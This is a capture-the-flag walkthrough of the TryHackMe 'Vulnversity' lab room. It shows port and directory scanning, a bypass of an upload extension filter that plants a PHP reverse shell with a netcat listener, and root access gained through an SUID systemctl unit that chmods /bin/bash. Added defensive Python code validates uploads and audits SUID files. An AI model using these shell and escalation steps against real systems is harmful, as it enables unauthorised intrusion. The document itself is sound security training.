The Dutch Hacker
Vulnversity tryhackme write up

Vulnversity on Tryhackme

This is the write-up for the room Vulnversity on Tryhackme; it is part of the Complete Beginner path.

Connect with the VPN, or use the AttackBox on the Tryhackme site, to reach the Tryhackme lab environment.

Tasks Vulnversity

Task 1

Deploy the machine attached to the task and press complete

Task 2

Before reading further, start scanning the box by typing in the following command

nmap -sV -sC <machine ip>

2.1 There are many nmap “cheatsheets” online that you can use too.

Press complete

2.2 Scan the box, how many ports are open?

Answer 6

2.3 What version of the squid proxy is running on the machine?

We can find this in the results of the nmap scan

Answer 3.5.12

2.4 How many ports will nmap scan if the flag -p-400 was used?

You can find the answer in the man page. The easiest way to find it is to type

man nmap | less +/-p-

More information about nmap can also be found in the Nmap room.

Answer 400

2.5 Using the nmap flag -n what will it not resolve?

Answer DNS

2.6 What is the most likely operating system this machine is running?

It is already revealed in the output of the nmap scan

Answer Ubuntu

2.7 What port is the web server running on?

We can find it in the nmap scan

Answer 3333

Task 3

3.1 What is the directory that has an upload form page?

First type in the command (do not copy it; type it in yourself, because for some reason copy/paste sometimes breaks the gobuster command)

gobuster dir -u http://<ip>:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

If you want to use a GUI interface instead, type in

dirbuster &

We find an odd one named internal. Navigating to it reveals the upload form page.

Answer: internal

Task 4

4.1 Try upload a few file types to the server, what common extension seems to be blocked?

Trying to upload a .php file is blocked: we get the error "Extension not allowed".

Answer .php

4.2 To identify which extensions are not blocked, we’re going to fuzz the upload form.

If you do not know what Burpsuite is and what it can do, please take a look at these write-ups.

Start Burpsuite and press complete

4.3 Run this attack, what extension is allowed?

Make a file with the extensions stated in the task

nano phpext.txt

Put in the following extensions inside the file and save it

.php
.php3
.php4
.php5
.phtml

In Firefox, turn on FoxyProxy for Burpsuite.


If you do not know what this is or how to configure it, please read this blog post: Configure Burpsuite with Firefox.

Refresh the site and turn on Intercept in Burpsuite. Then upload a file and see what happens in Burpsuite.


Now right-click the intercepted request and send it to Intruder.


Now navigate to Intruder and change the payload positions as shown in the screenshot.


Now navigate to the Payloads tab and load the list you created.


All the way at the bottom, turn off URL-encoding of the payload.

Now press the attack button

Notice the difference in Length between the responses.

Answer: .phtml

Now turn off the proxy intercept
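The Intruder run above shows why a denylist of extensions is the wrong control: the server blocked .php but forgot .phtml, which the PHP handler still executes. The following is an added example, not code from the room or from Tryhackme, that models a denylist matching the observed behaviour beside an allowlist-based validator; the filter functions and the accepted-extension set are assumptions about how an upload handler might be written.

```python
"""Denylist vs allowlist validation of uploaded filenames (added example)."""
import os
import re

# Assumed denylist modelled on what the room's form rejected: every listed
# PHP extension except .phtml, which is the one the fuzzing run let through.
DENYLIST = {".php", ".php3", ".php4", ".php5"}

# Assumed allowlist: what an image/document upload form actually needs to accept.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".txt"}

# The extension list from the task, i.e. what Intruder iterated over.
PHP_LIKE = [".php", ".php3", ".php4", ".php5", ".phtml"]


def denylist_filter(filename: str) -> bool:
    """Vulnerable check: accept unless the last extension is on the denylist."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in DENYLIST


def allowlist_filter(filename: str) -> bool:
    """Hardened check: plain basename, exactly one extension, and it must be approved."""
    name = os.path.basename(filename)
    if name != filename:
        return False  # a path component was present (e.g. ../): reject outright
    # One token, one dot: blocks double extensions such as shell.phtml.jpg
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", name):
        return False
    _, ext = os.path.splitext(name)
    return ext.lower() in ALLOWLIST


def fuzz(filter_fn, stem: str = "webshell"):
    """Replay the Intruder payload list and return the extensions a filter accepts."""
    return [ext for ext in PHP_LIKE if filter_fn(f"{stem}{ext}")]


if __name__ == "__main__":
    print("denylist accepts:", fuzz(denylist_filter))    # ['.phtml']
    print("allowlist accepts:", fuzz(allowlist_filter))  # []
    print("allowlist accepts photo.jpg:", allowlist_filter("photo.jpg"))
```

The allowlist also has to be backed by server configuration that never hands files in the upload directory to the PHP interpreter, otherwise a renamed file is still a risk.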

4.4 What is the name of the user who manages the webserver?

We are not going to download the webshell, as Kali already provides it under /usr/share/webshells/php


Now copy this file to your Documents directory. Do not edit the original file, only the copy.

cp /usr/share/webshells/php/php-reverse-shell.php ~/Documents/webshell.php

Now edit the copy with

nano webshell.php

After you have put in your own IP address, save the file.

Start a listener in a new terminal by entering the following command

nc -lvnp 1234

Now rename the file webshell.php to webshell.phtml and upload the file

Now navigate to

http://<ip>:3333/internal/uploads/webshell.phtml

Type in the following command to upgrade the shell to a proper TTY

python -c 'import pty; pty.spawn("/bin/bash")'

4.5 What is the name of the user who manages the webserver?

Navigate to the home directories and look at which user directory is there.

Answer: bill

4.6 What is the user flag?

cat the user.txt in bill's home directory. The output is the answer to the question.

Task 5

5.1 On the system, search for all SUID files. What file stands out?

Type in the following command to find all SUID files

find / -perm -u=s -type f 2>/dev/null
Answer /bin/systemctl
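The find command above lists every SUID file, and the odd one out only stands out if you know what a stock system ships with. As an added example (not code from the room or from Tryhackme), here is a small audit script that diffs that listing against an assumed baseline of legitimate SUID binaries; the baseline is an assumption modelled on a typical Ubuntu install, and the sample listing is constructed to resemble the room's output.

```python
"""Flag SUID files that are not in a known-good baseline (added example)."""
import subprocess

# Assumed baseline of SUID binaries that ship with the distribution.
# Tune this to your own golden image; anything else deserves a look.
EXPECTED_SUID = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
}

# Constructed sample resembling `find / -perm -u=s -type f 2>/dev/null` on the box.
SAMPLE_FIND_OUTPUT = """\
/bin/systemctl
/bin/mount
/bin/su
/bin/ping
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
"""


def unexpected_suid(find_output: str, baseline=EXPECTED_SUID):
    """Return the SUID paths from a find listing that are not in the baseline."""
    found = {line.strip() for line in find_output.splitlines() if line.strip()}
    return sorted(found - baseline)


def scan_live_host():
    """Run the same find command from the room on this host and diff the result."""
    proc = subprocess.run(["find", "/", "-perm", "-u=s", "-type", "f"],
                          capture_output=True, text=True)
    return unexpected_suid(proc.stdout)


if __name__ == "__main__":
    for path in unexpected_suid(SAMPLE_FIND_OUTPUT):
        # Remediation for a binary that never needs SUID: chmod u-s <path>
        print("unexpected SUID binary:", path)   # /bin/systemctl
```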

5.2 Become root and get the last flag (/root/root.txt)

Take a look at the systemctl entry on GTFOBins.

Type in the following, line by line

TF2=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"
[Install]
WantedBy=multi-user.target' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2

Now cat /tmp/root.txt


We did not actually become root; we only used this to read the file we wanted.

I tried using a netcat connection but it did not work for me. You can change anything in this line to get what you want.

ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"

Now, how do we become root?

Why not have the service set the SUID bit on /bin/bash, and then start a bash shell that keeps those root privileges (-p):
TF2=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2
/bin/bash -p
